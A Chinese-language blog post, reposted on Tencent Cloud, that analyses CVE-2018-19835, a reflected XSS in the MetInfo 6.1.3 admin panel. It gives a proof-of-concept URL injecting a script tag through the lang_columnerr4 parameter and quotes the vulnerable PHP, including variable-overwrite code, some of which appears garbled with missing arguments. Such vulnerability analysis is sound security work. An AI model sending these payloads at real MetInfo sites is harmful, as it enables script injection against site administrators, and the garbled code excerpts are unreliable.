前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Metinfo 6.1.3 后台XSS漏洞分析 CVE-2018-19835

Metinfo 6.1.3 后台XSS漏洞分析 CVE-2018-19835

作者头像
用户5878089
发布2019-07-25 16:30:27
5510
发布2019-07-25 16:30:27
举报
文章被收录于专栏:网络攻防实战知识交流

前言

学习使我快乐 没啥事干,还是好好学习吧 最近代码审计的比较多一点,简单给自己找点事干而已 metinfo6.0.0的漏洞分析了一堆,其实主要还是和它的传递参数的方式有关系,可以直接变量覆盖 没有经过特殊的过滤 以后的代码审计 还是先放一些POC 不需要分析漏洞细节的人可以直接拿去使用就好

漏洞利用方式

代码语言:javascript
复制
http://192.168.1.7/minfo/admin/column/move.php?foldyanzheng=1&foldername=search&lang_columnerr4=%3Cscript%3Ealert(1)%3C/script%3E&metcms=1

漏洞分析

漏洞主要代码存在于

代码语言:javascript
复制
/admin/column/move.php
代码语言:javascript
复制
require_once '../login/login_check.php';
require_once 'global.func.php';
if($foldyanzheng){
    $metcms='';
    $folder_m=$db->get_one("SELECT * FROM $met_column WHERE foldername='$foldername' and lang='$lang'");
    if($folder_m)$metcms=$lang_columnerr4;
    if(!preg_match('/^[a-z0-9_-]+$/i',metdetrim($foldername)))$metcms=$lang_columnerr1;
    echo $metcms;
    die;
}

由图中可以看出我们只需要$folderyanzheng> 0并且 $folder_m不是null,我们可以$lang_columnerr4直接显示在dom中 如果想要folder_m非空,可以让随便查询一个数据库,如图所示 查询数据库信息:

/include/common.inc.php存在一个可以由我们控制的变量的代码。 这里存在变量覆盖

代码语言:javascript
复制
foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
    foreach($$_request as $_key => $_value) {
        $_key{} != '_' && $$_key = daddslashes($_value,,,);
        $_M['form'][$_key]=daddslashes($_value,,,);
    }
}

可以构造出如上payload

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-01-26,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 无级安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 前言
  • 漏洞利用方式
  • 漏洞分析
相关产品与服务
代码审计
代码审计(Code Audit,CA)提供通过自动化分析工具和人工审查的组合审计方式,对程序源代码逐条进行检查、分析,发现其中的错误信息、安全隐患和规范性缺陷问题,以及由这些问题引发的安全漏洞,提供代码修订措施和建议。支持脚本类语言源码以及有内存控制类源码。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档